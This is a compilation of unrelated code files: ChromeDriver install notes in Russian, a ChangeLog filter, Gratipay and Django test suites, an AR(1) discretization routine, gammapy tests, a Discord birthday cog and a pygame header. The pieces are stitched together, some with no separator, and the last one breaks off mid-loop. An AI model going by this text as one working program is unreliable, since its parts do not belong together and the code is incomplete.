      'The average was {2}'.format(maxFall, minFall, averageFall))
|
# Установка драйвера для браузера
# В этом курсе мы будем работать с драйвером для Chrome, так как на данный момент это самый популярный браузер, и в первую очередь следует убедиться, что веб-приложение работает для большинства пользователей.
# http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201801-201808-bar
# http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201801-201808-bar
# Драйвер для Chrome разрабатывается командой браузера и носит название ChromeDriver. Для установки откройте сайт https://sites.google.com/a/chromium.org/chromedriver/downloads и скачайте ту версию ChromeDriver, которая соответствует версии вашего браузера. Чтобы узнать версию браузера, откройте новое окно в Chrome, в поисковой строке наберите: chrome://version/ и нажмите Enter. В верхней строчке вы увидите информацию про версию браузера.
# Для Linux:
# Давайте установим и настроим ChromeDriver с помощью команд в терминале. Укажем нужную нам версию ChromeDriver для загрузки. Для получения ссылки перейдите в браузере на нужную вам версию драйвера по ссылке на https://sites.google.com/a/chromium.org/chromedriver/downloads. На открывшейся странице нажмите на файле для Linux правой кнопкой и скопируйте путь к файлу. Замените в примере ниже путь к файлу для команды wget вашей ссылкой:
# $ wget https://chromedriver.storage.googleapis.com/75.0.3770.8/chromedriver_linux64.zip
# $ unzip chromedriver_linux64.zip
# Переместите разархивированный файл с СhromeDriver в нужную папку и разрешите запускать chromedriver как исполняемый файл:
# $ sudo mv chromedriver /usr/bin/chromedriver
# $ sudo chown root:root /usr/bin/chromedriver
# $ sudo chmod +x /usr/bin/chromedriver
# Настройки для Linux готовы. Переходите к следующему шагу.
# Для Windows:
# Скачайте с сайта https://sites.google.com/a/chromium.org/chromedriver/downloads драйвер для вашей версии браузера. Разархивируйте скачанный файл.
# Создайте на диске C: папку chromedriver и положите разархивированный ранее файл chromedriver.exe в папку C:\chromedriver.
# Добавьте в системную переменную PATH папку C:\chromedriver. Как это сделать в разных версиях Windows, описано здесь: https://www.computerhope.com/issues/ch000549.htm.
# Пример: как добавить путь в системную переменную PATH на Windows10
# 1. Откройте настройки системы.
# 2. В настройках откройте вкладку About, затем System info:
# 3. Выберите Advanced system settings:
# 4. Выберите Environment Variables:
# 5. Кликните два раза на строчке Path в System variables:
# 6. Нажмите кнопку New. Введите в новую строку путь к ChromeDriver - C:\chromedriver. Нажмите Enter. У вас должна появиться строка с указанным путем:
# 7. Если у вас была открыта командная строка Windows, не забудьте ее закрыть. Затем откройте новую командную строку, чтобы изменения переменной окружения стали доступны. Активируйте снова виртуальное окружение selenium_env, которое мы создали в предыдущих шагах.
# В следующем шаге мы запустим браузер с помощью Selenium WebDriver и выполним простые команды. |
#!/usr/bin/python
import sys, os, string, re
#This script goes through a ChangeLog and grabs sections based on the search string
#entered by the user. Sections are defined as text between dates
# NOTE: Python 2 script (print statements, string.split module function).
# Validate command-line arguments: filename and branch search string.
if(len(sys.argv) != 3):
    print "Invalid Number of Args"
    print "Usage - adjustChangeLog.py filename searchString"
    sys.exit(1)
#print "Trying to open " + sys.argv[1]
#Using a try/except to catch file errors
try:
    inputFile = open(sys.argv[1],'r') #Open a file for reading
    outputFile = open("newChangeLog", 'w') #Open file for writing
except IOError:
    print "Error Opening the File"
    sys.exit(1)
except:
    print "Unhandled Exception"
    sys.exit(1)
#print "Open Successful"
#Here's the deal: We're gonna use a for loop, run through all the lines storing
#them in a buffer
#if we find our string, we'll set a flag, when we hit a date, we'll write and flush, or just
#flush the buffer
# Match the search string wrapped in literal parentheses, e.g. "(branch)".
branchRegEx = re.compile('\(' + sys.argv[2] + r'\)')
stringBuffer = ""
matchToken = 0 #token indicating that our buffer is a good buffer
for line in inputFile.readlines():
    # A leading date (YYYY-MM-DD style) marks the start of a new section.
    temp = re.match(r'\d+-\d+-\d+', line)
    temp2 = branchRegEx.search(line)
    if temp: #new date, write if we have had a match, otherwise dump the buffer
        if(matchToken):
            outputFile.write(stringBuffer) #write buffer
            stringBuffer = "" #reset the string buffer
            matchToken = 0 #reset token
            temp3 = string.split(line)
            line = temp3[0] + " " + temp3[1] #this removes the names from the changelog, formerly rmname.pl
        else:
            stringBuffer = "" #store nothing in the string buffer to reset it
            #We need these here again for the first entry in the CL
            temp3 = string.split(line)
            line = temp3[0] + " " + temp3[1] #this removes the names from the changelog, formerly rmname.pl
    elif temp2: #we have a match, set the variable
        matchToken = 1
        line = branchRegEx.sub("", line) #this removes the search string from the changelog
    #just copy the line to the buffer while we look for various matches
    stringBuffer += line
if matchToken: #No date after last entry, so check one last time
    outputFile.write(stringBuffer)
#clean up
outputFile.close()
inputFile.close()
|
from __future__ import print_function, unicode_literals
import datetime
from decimal import Decimal
import json
from mock import patch
from gratipay import wireup
from gratipay.billing.payday import Payday
from gratipay.testing import Harness
# Subclass datetime.datetime and swap it in so tests can patch
# DateTime.utcnow (attributes of the builtin C type are read-only).
class DateTime(datetime.datetime): pass
datetime.datetime = DateTime
class TestCommaize(Harness):
    """Tests for the commaize number-formatting helper on the stats simplate."""
    # XXX This really ought to be in helper methods test file
    def setUp(self):
        Harness.setUp(self)
        # Pull the commaize helper out of the simplate's first page namespace.
        simplate = self.client.load_resource(b'/about/stats.html')
        self.commaize = simplate.pages[0]['commaize']
    def test_commaize_commaizes(self):
        actual = self.commaize(1000.0)
        assert actual == "1,000"
    def test_commaize_commaizes_and_obeys_decimal_places(self):
        actual = self.commaize(1000, 4)
        assert actual == "1,000.0000"
class TestChartOfReceiving(Harness):
    """Tests for Participant.get_tip_distribution, the data behind the stats chart.

    NOTE: Python 2 source (uses 1L long literals); result rows appear to be
    [amount, ncontributors, total, share_of_contributors, share_of_amount]
    -- confirm against get_tip_distribution's definition.
    """
    def setUp(self):
        Harness.setUp(self)
        # Two funded participants; empty last_bill_result means a good card.
        for participant in ['alice', 'bob']:
            p = self.make_participant(participant, claimed_time='now', last_bill_result='')
            setattr(self, participant, p)
    def test_get_tip_distribution_handles_a_tip(self):
        self.alice.set_tip_to(self.bob, '3.00')
        expected = ([[Decimal('3.00'), 1, Decimal('3.00'), 1.0, Decimal('1')]],
                    1.0, Decimal('3.00'))
        actual = self.bob.get_tip_distribution()
        assert actual == expected
    def test_get_tip_distribution_handles_no_tips(self):
        expected = ([], 0.0, Decimal('0.00'))
        actual = self.alice.get_tip_distribution()
        assert actual == expected
    def test_get_tip_distribution_handles_multiple_tips(self):
        carl = self.make_participant('carl', claimed_time='now', last_bill_result='')
        self.alice.set_tip_to(self.bob, '1.00')
        carl.set_tip_to(self.bob, '3.00')
        expected = ([
            [Decimal('1.00'), 1L, Decimal('1.00'), 0.5, Decimal('0.25')],
            [Decimal('3.00'), 1L, Decimal('3.00'), 0.5, Decimal('0.75')]
        ], 2.0, Decimal('4.00'))
        actual = self.bob.get_tip_distribution()
        assert actual == expected
    def test_get_tip_distribution_handles_big_tips(self):
        # Plural (team) accounts may receive tips above the individual cap.
        self.bob.update_number('plural')
        carl = self.make_participant('carl', claimed_time='now', last_bill_result='')
        self.alice.set_tip_to(self.bob, '200.00')
        carl.set_tip_to(self.bob, '300.00')
        expected = ([
            [Decimal('200.00'), 1L, Decimal('200.00'), 0.5, Decimal('0.4')],
            [Decimal('300.00'), 1L, Decimal('300.00'), 0.5, Decimal('0.6')]
        ], 2.0, Decimal('500.00'))
        actual = self.bob.get_tip_distribution()
        assert actual == expected
    def test_get_tip_distribution_ignores_bad_cc(self):
        # A non-empty last_bill_result marks a failing credit card.
        bad_cc = self.make_participant('bad_cc', claimed_time='now', last_bill_result='Failure!')
        self.alice.set_tip_to(self.bob, '1.00')
        bad_cc.set_tip_to(self.bob, '3.00')
        expected = ([[Decimal('1.00'), 1L, Decimal('1.00'), 1, Decimal('1')]],
                    1.0, Decimal('1.00'))
        actual = self.bob.get_tip_distribution()
        assert actual == expected
    def test_get_tip_distribution_ignores_missing_cc(self):
        # last_bill_result=None marks a participant with no card on file.
        missing_cc = self.make_participant('missing_cc', claimed_time='now', last_bill_result=None)
        self.alice.set_tip_to(self.bob, '1.00')
        missing_cc.set_tip_to(self.bob, '3.00')
        expected = ([[Decimal('1.00'), 1L, Decimal('1.00'), 1, Decimal('1')]],
                    1.0, Decimal('1.00'))
        actual = self.bob.get_tip_distribution()
        assert actual == expected
class TestJson(Harness):
    """Smoke test for the JSON stats endpoint."""
    def test_200(self):
        response = self.client.GET('/about/stats.json')
        assert response.code == 200
        body = json.loads(response.body)
        assert len(body) > 0
class TestRenderingStatsPage(Harness):
    """Tests that the stats page copy reflects whether a payday is running."""
    def get_stats_page(self):
        return self.client.GET('/about/stats.html').body
    @patch.object(DateTime, 'utcnow')
    def test_stats_description_accurate_during_payday_run(self, utcnow):
        """Test that stats page takes running payday into account.

        This test was originally written to expose the fix required for
        https://github.com/gratipay/gratipay.com/issues/92.
        """
        # Paydays run on Thursdays; pin "now" to one.
        a_thursday = DateTime(2012, 8, 9, 11, 00, 01)
        utcnow.return_value = a_thursday
        self.client.hydrate_website()
        env = wireup.env()
        wireup.billing(env)
        # Start (but do not finish) a payday so the page sees one in flight.
        payday = Payday.start()
        body = self.get_stats_page()
        assert "is changing hands <b>right now!</b>" in body, body
        payday.end()
    @patch.object(DateTime, 'utcnow')
    def test_stats_description_accurate_outside_of_payday(self, utcnow):
        """Test stats page outside of the payday running"""
        a_monday = DateTime(2012, 8, 6, 11, 00, 01)
        utcnow.return_value = a_monday
        self.client.hydrate_website()
        payday = Payday.start()
        body = self.get_stats_page()
        assert "is ready for <b>this Thursday</b>" in body, body
        payday.end()
|
from setuptools import setup
setup(
    name='fake project',
    author='Nobody Important',
    # Packages must be dotted module paths, not filesystem paths with slashes.
    packages=['fakeproject', 'fakeproject.sub'],
    # Version must be a string; setuptools rejects/warns on non-string versions.
    version='0.1',
)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 11:23:28 2017
@author: mmic
"""
import numpy as np
import scipy.stats as st
from scipy.stats import norm
import scipy.integrate as integrate
import numba
def rouwen(rho, mu, step, num):
    '''
    Adapted from Lu Zhang and Karen Kopecky. Python by Ben Tengelsen.
    Construct transition probability matrix for discretizing an AR(1)
    process. This procedure is from Rouwenhorst (1995), which works
    well for very persistent processes.

    INPUTS:
    rho  - persistence (close to one)
    mu   - mean and the middle point of the discrete state space
    step - step size of the even-spaced grid
    num  - number of grid points on the discretized process

    OUTPUT:
    dscSp  - discrete state space (num by 1 vector)
    transP - transition probability matrix over the grid
    '''
    # Evenly spaced state space centred on mu.
    dscSp = np.linspace(mu - (num - 1) / 2 * step, mu + (num - 1) / 2 * step,
                        num).T

    # Base 3x3 matrix; p = q because the process is symmetric.
    q = p = (rho + 1) / 2.
    transP = np.array([[p**2, p*(1-q), (1-q)**2],
                       [2*p*(1-p), p*q+(1-p)*(1-q), 2*q*(1-q)],
                       [(1-p)**2, (1-p)*q, q**2]]).T

    # Recursively expand the matrix one grid point at a time (Rouwenhorst 1995).
    while transP.shape[0] <= num - 1:
        len_P = transP.shape[0]
        transP = p * np.vstack((np.hstack((transP, np.zeros((len_P, 1)))), np.zeros((1, len_P+1)))) \
            + (1 - p) * np.vstack((np.hstack((np.zeros((len_P, 1)), transP)), np.zeros((1, len_P+1)))) \
            + (1 - q) * np.vstack((np.zeros((1, len_P+1)), np.hstack((transP, np.zeros((len_P, 1)))))) \
            + q * np.vstack((np.zeros((1, len_P+1)), np.hstack((np.zeros((len_P, 1)), transP))))
        transP[1:-1] /= 2.  # interior rows were counted twice above

    # Sanity check: every row must sum to one.  BUGFIX: compare the row sums
    # against a length-num vector of ones; the original compared against
    # np.ones(transP.shape), a (num, num) matrix, which only gave the right
    # answer by accidental broadcasting.
    if np.max(np.abs(np.sum(transP, axis=1) - np.ones(num))) >= 1e-12:
        print('Problem in rouwen routine!')
        return None
    else:
        return transP.T, dscSp
# Simulate the Markov process - will make this a function so can call later
def sim_markov(z, Pi, num_draws):
    '''
    Simulate a discrete Markov chain.

    INPUTS:
    z         - grid of discrete states (unused beyond documentation here;
                the function returns indices into this grid)
    Pi        - transition probability matrix; read column-wise:
                Pi[next, current] is the probability of moving from state
                `current` to state `next`
    num_draws - number of periods to simulate

    OUTPUT:
    z_discrete - integer array of simulated grid indices
    '''
    # draw some random numbers on [0, 1]
    u = np.random.uniform(size=num_draws)

    z_discrete = np.empty(num_draws)  # indices into the discretized grid
    oldind = 0  # start the chain in the first grid state
    z_discrete[0] = oldind
    for i in range(1, num_draws):
        # Invert the CDF of column `oldind` at the uniform draw u[i].
        sum_p = 0
        ind = 0
        while sum_p < u[i]:
            sum_p = sum_p + Pi[ind, oldind]
            ind += 1
        if ind > 0:
            ind -= 1
        z_discrete[i] = ind
        oldind = ind
    # BUGFIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; it was
    # simply an alias for the builtin int, which is the documented replacement.
    z_discrete = z_discrete.astype(dtype=int)
    return z_discrete
# Function to calculate the distance between mu_s and mu_d
def dist(A, B, C):
    """Return the quadratic form (A - B)' inv(C) (A - B)."""
    diff = A - B
    return np.dot(np.dot(diff.T, np.linalg.inv(C)), diff)
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import astropy.units as u
from numpy.testing import assert_allclose
from astropy.tests.helper import pytest, assert_quantity_allclose
from ...datasets import gammapy_extra
from ...utils.testing import requires_dependency, requires_data
from ...data import ObservationTable
from ...spectrum import SpectrumObservation, SpectrumObservationList
@requires_data('gammapy-extra')
@requires_dependency('matplotlib')
@requires_dependency('scipy')
def test_spectrum_observation():
    # Smoke test: reading a PHA file and producing the diagnostic plot
    # (peek) must not raise.
    phafile = gammapy_extra.filename("datasets/hess-crab4_pha/pha_obs23523.fits")
    obs = SpectrumObservation.read(phafile)
    obs.peek()
@pytest.mark.xfail(reason='This needs some changes to the API')
@requires_data('gammapy-extra')
def test_observation_stacking():
    # Stack two observations and compare the grouped result against the same
    # quantities computed by hand from the two inputs.
    obs_table_file = gammapy_extra.filename(
        'datasets/hess-crab4_pha/observation_table.fits')

    obs_table = ObservationTable.read(obs_table_file)
    temp = SpectrumObservationList.from_observation_table(obs_table)
    observations = temp.get_obslist_from_ids([23523, 23592])
    spectrum_observation_grouped = SpectrumObservation.stack_observation_list(observations, 0)
    obs0 = observations[0]
    obs1 = observations[1]

    # Test sum on/off vector and alpha group
    sum_on_vector = obs0.on_vector.counts + obs1.on_vector.counts
    sum_off_vector = obs0.off_vector.counts + obs1.off_vector.counts
    # Grouped alpha is the off-counts-weighted mean of the individual alphas.
    alpha_times_off_tot = obs0.alpha * obs0.off_vector.total_counts + obs1.alpha * obs1.off_vector.total_counts
    total_off = obs0.off_vector.total_counts + obs1.off_vector.total_counts

    assert_allclose(spectrum_observation_grouped.on_vector.counts, sum_on_vector)
    assert_allclose(spectrum_observation_grouped.off_vector.counts, sum_off_vector)
    assert_allclose(spectrum_observation_grouped.alpha, alpha_times_off_tot / total_off)

    # Test arf group: effective area is the livetime-weighted mean.
    total_time = obs0.meta.livetime + obs1.meta.livetime
    arf_times_livetime = obs0.meta.livetime * obs0.effective_area.data \
                         + obs1.meta.livetime * obs1.effective_area.data
    assert_allclose(spectrum_observation_grouped.effective_area.data, arf_times_livetime / total_time)

    # Test rmf group: dispersion is weighted by livetime * effective area.
    rmf_times_arf_times_livetime = obs0.meta.livetime * obs0.effective_area.data \
                                   * obs0.energy_dispersion.pdf_matrix.T \
                                   + obs1.meta.livetime * obs1.effective_area.data \
                                   * obs1.energy_dispersion.pdf_matrix.T

    # Bins where the ratio is NaN (zero weight denominator) are zeroed before
    # the comparison.
    inan = np.isnan(rmf_times_arf_times_livetime / arf_times_livetime)
    pdf_expexted = rmf_times_arf_times_livetime / arf_times_livetime
    pdf_expexted[inan] = 0
    assert_allclose(spectrum_observation_grouped.energy_dispersion.pdf_matrix, pdf_expexted.T, atol=1e-6)
|
#!/usr/bin/env python3
import asyncio
import discord
import datetime
from discord.ext import commands
from utils import database, shared, utils, checks
def time_until_next_birthday():
    """Return the number of seconds until the next birthday check.

    Returns 0 (check immediately) when no check has ever run or when the
    last recorded check is not from today; otherwise returns the seconds
    remaining until tomorrow at 12:00 UTC.
    """
    last_check = utils.read_property('last_birthday_check')
    if not last_check:
        # Never checked before: run right away.
        return 0
    today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
    if last_check != today:
        # Last check was on a previous day: run right away.
        return 0
    now = datetime.datetime.utcnow()
    next_noon = now.replace(hour=12, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
    return (next_noon - now).total_seconds()
async def check_birthdays(bot):
    """Wish a happy birthday to every eligible user whose birthday is today."""
    print(f'checking birthdays {datetime.datetime.utcnow()}')
    # Record that the check ran today so the scheduler can skip reruns.
    utils.write_property('last_birthday_check', datetime.datetime.utcnow().strftime('%Y-%m-%d'))
    session = database.new_session()
    users = session.query(database.User).filter(database.User.birthdate.isnot(None)).all()
    today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
    for user in users:
        # Compare month-day only ('-MM-DD'), ignoring the birth year.
        if (user.birthdate[4:] == today[4:]
                and user.discord_id not in shared.birthday_blacklist
                and utils.is_birthdate_valid(user.birthdate)):
            await wish_birthday(bot, user)
async def wish_birthday(bot, user):
    # Post the birthday greeting in the configured general channel.
    general = bot.get_channel(shared.general_channel)
    message = f'Happy birthday <@{user.discord_id}>! {shared.emote_tada}{shared.emote_tada}{shared.emote_tada}'
    await bot.send_message(general, message)
class Birthday:
    """Cog exposing owner-only commands around the birthday checker."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command(pass_context=True)
    @checks.is_owner()
    async def birthday(self, ctx):
        # Manually trigger the birthday check; acknowledge with a reaction first.
        await ctx.bot.add_reaction(ctx.message, shared.reaction_ok)
        await check_birthdays(ctx.bot)

    @commands.command(pass_context=True)
    @checks.is_owner()
    async def birthdaytime(self, ctx):
        # Report how long until the next scheduled birthday check.
        await ctx.bot.say(f'Seconds until next check: {int(time_until_next_birthday())}')
def setup(bot):
    # discord.py extension entry point: register the cog on the bot.
    bot.add_cog(Birthday(bot))
from datetime import date
from django.db import IntegrityError
from django.urls import reverse
import django_comments
from fiscal.forms import MemberForm
from workshops.models import Member, MemberRole, Membership
from workshops.tests.base import TestBase
# Concrete comment model configured for django_comments; used in assertions.
CommentModel = django_comments.get_model()
class MembershipTestMixin:
    """Mixin creating a Membership fixture (consortium or not) for tests."""

    def setUpMembership(self, consortium: bool):
        self.membership = Membership.objects.create(
            name="Test Membership",
            consortium=consortium,
            public_status="public",
            variant="partner",
            agreement_start="2021-02-14",
            agreement_end="2022-02-14",
            contribution_type="financial",
            public_instructor_training_seats=0,
            additional_public_instructor_training_seats=0,
        )
        # Any pre-existing role works for these tests; pick the first one.
        self.member_role = MemberRole.objects.first()
class TestMemberFormLayout(TestBase):
    """Check the crispy-forms helper layouts defined on MemberForm."""

    def test_main_helper_layout(self):
        form = MemberForm()
        self.assertEqual(
            list(form.helper.layout),
            ["membership", "organization", "role", "EDITABLE", "id", "DELETE"],
        )

    def test_empty_helper_layout(self):
        # The empty-form helper keeps DELETE as its last, wrapped element.
        form = MemberForm()
        self.assertEqual(len(form.helper_empty_form.layout), 5)
        self.assertEqual(
            list(form.helper_empty_form.layout)[:-1],
            ["membership", "organization", "role", "id"],
        )
        self.assertEqual(form.helper_empty_form.layout[-1].fields, ["DELETE"])
class TestMembershipMembers(MembershipTestMixin, TestBase):
    """End-to-end tests for the membership members formset view."""

    def setUp(self):
        super().setUp()
        self._setUpUsersAndLogin()

    def test_adding_new_member_to_nonconsortium(self):
        """Ensure only 1 member can be added to non-consortium membership."""
        self.setUpMembership(consortium=False)
        self.assertEqual(self.membership.member_set.count(), 0)

        # only 1 member allowed
        data = {
            "form-TOTAL_FORMS": 1,
            "form-INITIAL_FORMS": 0,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": self.org_alpha.pk,
            "form-0-role": self.member_role.pk,
            "form-0-id": "",
            "form-0-EDITABLE": True,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        self.assertEqual(self.membership.member_set.count(), 1)
        self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])

        # posting this will fail because only 1 form in the formset is allowed
        data = {
            "form-TOTAL_FORMS": 2,
            "form-INITIAL_FORMS": 0,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": "",
            "form-0-organization": self.org_alpha.pk,
            "form-0-role": self.member_role.pk,
            "form-0-id": "",
            "form-0-EDITABLE": True,
            "form-1-membership": "",
            "form-1-organization": self.org_beta.pk,
            "form-1-role": self.member_role.pk,
            "form-1-id": "",
            "form-1-EDITABLE": True,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(self.membership.member_set.count(), 1)  # number didn't change

    def test_adding_new_members_to_consortium(self):
        """Ensure 1+ members can be added to consortium membership."""
        self.setUpMembership(consortium=True)
        self.assertEqual(self.membership.member_set.count(), 0)

        data = {
            "form-TOTAL_FORMS": 2,
            "form-INITIAL_FORMS": 0,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": self.org_alpha.pk,
            "form-0-role": self.member_role.pk,
            "form-0-id": "",
            "form-0-EDITABLE": True,
            "form-1-membership": self.membership.pk,
            "form-1-organization": self.org_beta.pk,
            "form-1-role": self.member_role.pk,
            "form-1-id": "",
            "form-1-EDITABLE": True,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        self.assertEqual(self.membership.member_set.count(), 2)
        self.assertEqual(
            list(self.membership.organizations.all()), [self.org_alpha, self.org_beta]
        )

    def test_removing_members_from_nonconsortium(self):
        """Ensure removing the only member from non-consortium membership is not
        allowed."""
        self.setUpMembership(consortium=False)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )

        data = {
            "form-TOTAL_FORMS": 1,
            "form-INITIAL_FORMS": 1,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": "",
            "form-0-organization": m1.organization.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
            "form-0-EDITABLE": True,
            "form-0-DELETE": "on",
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertEqual(response.status_code, 200)  # response failed
        self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])

    def test_removing_members_from_consortium(self):
        """Ensure removing all members from consortium membership is allowed."""
        self.setUpMembership(consortium=True)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )
        m2 = Member.objects.create(
            organization=self.org_beta,
            membership=self.membership,
            role=self.member_role,
        )

        data = {
            "form-TOTAL_FORMS": 2,
            "form-INITIAL_FORMS": 2,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": "",
            "form-0-organization": m1.organization.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
            "form-0-EDITABLE": True,
            "form-0-DELETE": "on",
            "form-1-membership": "",
            "form-1-organization": m2.organization.pk,
            "form-1-role": m2.role.pk,
            "form-1-id": m2.pk,
            "form-1-EDITABLE": True,
            "form-1-DELETE": "on",
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        self.assertEqual(list(self.membership.organizations.all()), [])

    def test_mix_adding_removing_members_from_consortium(self):
        """Ensure a mixed-content formset for consortium membership members works
        fine (e.g. a new member is added, and an old one is removed)."""
        self.setUpMembership(consortium=True)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )

        data = {
            "form-TOTAL_FORMS": 2,
            "form-INITIAL_FORMS": 1,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": m1.organization.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
            "form-0-EDITABLE": True,
            "form-0-DELETE": "on",
            "form-1-membership": self.membership.pk,
            "form-1-organization": self.org_beta.pk,
            "form-1-role": self.member_role.pk,
            "form-1-id": "",
            "form-1-EDITABLE": True,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        self.assertEqual(list(self.membership.organizations.all()), [self.org_beta])

    def test_editing_noneditable_members_fails(self):
        """Ensure an attempt to edit member without 'editable' checkbox ticked off
        fails with validation error."""
        self.setUpMembership(consortium=True)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )

        # Note: no "form-0-EDITABLE" key, but the organization is changed.
        data = {
            "form-TOTAL_FORMS": 1,
            "form-INITIAL_FORMS": 1,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": self.org_beta.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertEqual(response.status_code, 200)  # form failed
        self.assertEqual(
            response.context["formset"].errors[0],
            {"__all__": ["Form values weren't supposed to be changed."]},
        )
        self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])

    def test_not_editing_noneditable_members_succeeds(self):
        """Ensure saving edit member without 'editable' checkbox ticked off works fine.

        No changes are introduced to the member."""
        self.setUpMembership(consortium=True)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )

        # Same values as the existing member, so no change is attempted.
        data = {
            "form-TOTAL_FORMS": 1,
            "form-INITIAL_FORMS": 1,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": m1.organization.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])

    def test_mix_adding_removing_members_leaves_comment(self):
        """Ensure a mixed-content formset for consortium membership members leaves
        correct message in the comments."""
        self.setUpMembership(consortium=True)
        m1 = Member.objects.create(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )

        data = {
            "form-TOTAL_FORMS": 2,
            "form-INITIAL_FORMS": 1,
            "form-MIN_NUM_FORMS": 0,
            "form-MAX_NUM_FORMS": 1000,
            "form-0-membership": self.membership.pk,
            "form-0-organization": m1.organization.pk,
            "form-0-role": m1.role.pk,
            "form-0-id": m1.pk,
            "form-0-EDITABLE": True,
            "form-0-DELETE": "on",  # marks org_alpha member for removal
            "form-1-membership": self.membership.pk,
            "form-1-organization": self.org_beta.pk,
            "form-1-role": self.member_role.pk,
            "form-1-id": "",  # no ID, so a new member for org_beta will be created
            "form-1-EDITABLE": True,
        }
        response = self.client.post(
            reverse("membership_members", args=[self.membership.pk]),
            data=data,
            follow=True,
        )
        self.assertRedirects(
            response, reverse("membership_details", args=[self.membership.pk])
        )
        comment = CommentModel.objects.first()
        self.assertEqual(
            comment.comment,
            f"""Changed members on {date.today():%Y-%m-%d}:

* Added Beta Organization <beta.com>

* Removed Alpha Organization <alpha.edu>""",
        )
class TestMemberUnique(MembershipTestMixin, TestBase):
    """Uniqueness of the (organization, membership, role) combination."""

    def test_duplicate_members_with_the_same_role_fail(self):
        """Duplicate Member & Role should fail for given membership."""
        # Arrange
        self.setUpMembership(consortium=True)
        member1 = Member(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )
        member2 = Member(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )
        # Act
        member1.save()
        # Assert
        with self.assertRaises(IntegrityError):
            member2.save()

    def test_distinct_members_for_the_same_membership(self):
        """Distinct Member & Role should work for given membership."""
        # Arrange
        self.setUpMembership(consortium=True)
        member1 = Member(
            organization=self.org_alpha,
            membership=self.membership,
            role=self.member_role,
        )
        member2 = Member(
            organization=self.org_beta,
            membership=self.membership,
            role=self.member_role,
        )
        member3 = Member(
            organization=self.org_alpha,
            membership=self.membership,
            role=MemberRole.objects.last(),
        )
        # Act & Assert: each differs in organization or role, so all must save.
        member1.save()
        member2.save()
        member3.save()
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''Copyright (C) 2018, Nudt, JingshengTang, All Rights Reserved
#Author: Jingsheng Tang
#Email: mrtang@nudt.edu.cn
# This gui program employs the vertical synchronization mode on the basis of using the directx
# graphic driver. It makes the program update the drawing synchornously with the monitor, thus
# to accurately contorl the stimulus graphics. It is similar to the sychtoolbox of Matlab. On
# this basis, the stimulus marker event is also set synchronously with the actual drawing.
# Since the vertical synchronization mode is used, the graphic user interface is fullscreen.
update: 2019/5/23
'''
import pygame
from pygame.locals import *

# Batch-import the supported stimulus modules; extensible via
# modules.MY_MODULES (maps script name -> class name).
MODULES = {}
from modules import MY_MODULES
for script in MY_MODULES:
    # eg. from block import Block
    # eg. the Block is callable by MODULES['Block']
